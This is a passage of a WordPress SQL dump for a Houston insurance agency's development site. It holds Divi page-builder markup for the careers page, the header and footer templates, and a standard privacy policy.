button_one_bg_color=\"#666666\" button_one_bg_enable_color=\"on\" hover_enabled=\"0\" sticky_enabled=\"0\" button_one_url=\"https://www.ailife.com/products\" button_one_url_new_window=\"on\" template_type=\"module\"][/dsm_button]','Dark Button','','publish','closed','closed','','dark-button','','','2023-04-02 18:07:26','2023-04-02 18:07:26','',0,'http://cmdev-site1.com/et_pb_layout/dark-button/',0,'et_pb_layout','',0),(590,1,'2023-04-02 18:18:35','2023-04-02 18:18:35','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\" custom_padding=\"66px||66px|||\" custom_margin=\"|auto||118px||\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" width=\"70%\" sticky_enabled=\"0\" custom_margin=\"|||70px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" header_2_text_align=\"center\" sticky_enabled=\"0\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" color=\"#FFFFFF\" background_color=\"#666666\" header=\"Products & Services\" background_layout=\"dark\" text_gap=\"15px\" divider_weight=\"5px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" background_enable_color=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_2,1_2\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"50%\" custom_margin=\"|||193px||\" align=\"center\" custom_padding=\"|0px||||\"][/et_pb_image][dsm_text_badges _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" main_text=\"Life Insurance\" link_option_url=\"https://www.ailife.com/products\" badges_text=\"Policies\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|||178px||\" badges_background_color=\"#003372\"][/dsm_text_badges][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"50%\" align=\"center\" custom_margin=\"|170px||||\"][/et_pb_image][dsm_text_badges _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" main_text=\"Policyholder Services\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" badges_background_color=\"#003372\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_cta button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" button_url=\"https://www.ariasagencies.com/products-services/\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" background_layout=\"light\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 18:18:35','2023-04-02 18:18:35','',38,'http://cmdev-site1.com/?p=590',0,'revision','',0),(588,1,'2023-04-02 18:17:24','2023-04-02 18:17:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-02 18:17:24','2023-04-02 18:17:24','',528,'http://cmdev-site1.com/?p=588',0,'revision','',0),(724,1,'2023-04-03 23:38:01','2023-04-03 23:38:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-03 23:38:01','2023-04-03 23:38:01','',38,'http://cmdev-site1.com/?p=724',0,'revision','',0),(589,1,'2023-04-02 18:17:24','2023-04-02 18:17:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\" custom_padding=\"66px||66px|||\" custom_margin=\"|auto||118px||\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" width=\"70%\" sticky_enabled=\"0\" custom_margin=\"|||70px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" header_2_text_align=\"center\" sticky_enabled=\"0\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" color=\"#FFFFFF\" background_color=\"#666666\" header=\"Products & Services\" background_layout=\"dark\" text_gap=\"15px\" divider_weight=\"5px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" background_enable_color=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_2,1_2\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"50%\" custom_margin=\"|||193px||\" align=\"center\" custom_padding=\"|0px||||\"][/et_pb_image][dsm_text_badges _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" main_text=\"Life Insurance\" link_option_url=\"https://www.ailife.com/products\" badges_text=\"Policies\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|||178px||\" badges_background_color=\"#003372\"][/dsm_text_badges][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"50%\" align=\"center\" custom_margin=\"|170px||||\"][/et_pb_image][dsm_text_badges _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" main_text=\"Policyholder Services\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" badges_background_color=\"#003372\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_cta button_text=\"Request an agent\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" button_url=\"https://www.ariasagencies.com/products-services/\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" background_layout=\"light\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 18:17:24','2023-04-02 18:17:24','',38,'http://cmdev-site1.com/?p=589',0,'revision','',0),(592,1,'2023-04-02 18:31:57','2023-04-02 18:31:57','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header=\"Our Story\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" divider_style=\"dotted\" divider_weight=\"3px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section]','PAGE HEADER','','publish','closed','closed','','page-header','','','2023-04-02 18:31:57','2023-04-02 18:31:57','',0,'http://cmdev-site1.com/et_pb_layout/page-header/',0,'et_pb_layout','',0),(793,3,'2023-04-08 12:52:19','2023-04-08 12:52:19','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#FFFFFF|dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-08 12:52:19','2023-04-08 12:52:19','',523,'http://cmdev-site1.com/?p=793',0,'revision','',0),(599,1,'2023-04-02 18:48:12','2023-04-02 18:48:12','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\" text_text_color=\"#FFFFFF\" text_orientation=\"center\" link_text_color=\"#FFFFFF\" link_text_align=\"center\" link_font=\"||||on|||#FFFFFF|dotted\" sticky_enabled=\"0\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"http://cmdev-site1.com/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-02 18:48:12','2023-04-02 18:48:12','',523,'http://cmdev-site1.com/?p=599',0,'revision','',0),(601,1,'2023-04-02 18:49:51','2023-04-02 18:49:51','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2023-04-02 18:49:51','2023-04-02 18:49:51','',3,'http://cmdev-site1.com/?p=601',0,'revision','',0),(703,1,'2023-04-03 23:20:54','2023-04-03 23:20:54','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"-11px|||||\" custom_padding=\"2px||4px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|0px|auto|false|false\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" custom_margin=\"||||false|false\" custom_padding=\"30px||||false|false\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home 